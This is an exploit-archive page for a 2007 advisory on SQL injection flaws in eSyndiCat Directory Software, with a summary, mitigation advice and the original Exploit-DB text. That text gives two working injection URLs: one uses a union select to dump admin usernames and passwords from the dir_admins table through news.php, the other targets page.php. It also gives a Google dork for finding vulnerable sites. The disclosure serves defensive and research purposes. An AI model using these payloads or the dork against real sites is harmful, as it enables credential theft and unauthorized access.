header-logo
Suggest Exploit
vendor:
eSyndiCat Directory Software
by:
d3v1l
N/A
CVSS
HIGH
SQL Injection
89
CWE
Product Name: eSyndiCat Directory Software
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

eSyndiCat: Multiple SQL Injection’s

The eSyndiCat software is vulnerable to multiple SQL injection attacks. The first attack can be performed by modifying the 'id' parameter in the 'news.php' file, allowing an attacker to retrieve sensitive information from the 'dir_admins' table. The second attack can be performed by modifying the 'name' parameter in the 'page.php' file, allowing an attacker to bypass authentication and access unauthorized information.

Mitigation:

To mitigate these vulnerabilities, it is recommended to implement proper input validation and parameterized queries to prevent SQL injection attacks. Additionally, keeping the software up to date with the latest patches and security updates is crucial.
Source

Exploit-DB raw data:

[~] eSyndiCat: Multiple SQL Injection's
[~] 
[~] http://www.esyndicat.net/
[~] ----------------------------------------------------------
[~] Exploit coded and founded by d3v1l
[~] 
[~] Date: 14.07.2007
[~]
[~]
[~] stylers1@hotmail.it
[~]
[~] -----------------------------------------------------------
[~] Greetz tO:-
[~]  
[~] Security-Shell Members ( http://forum.security-shell.com )
[~]  
[~] Pentest | Gibon | Nocta | dr4g0n | deadfuneral | and str0ke
[~]-------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://site.com/news.php?id=-1%27%20union%20select%201,username,password,4,5%20from%20dir_admins/*
[~]    
[~] http://site.com/page.php?name=-1%27%20union%20select%200,0,0,0,0,0,0,0,0/* 
[~] 
[~]
[~]---------------------------------------------------------------------------------------------------------------
[~] Google Dork: © 2005-2006 Powered by eSyndiCat Directory Software   

# milw0rm.com [2007-07-14]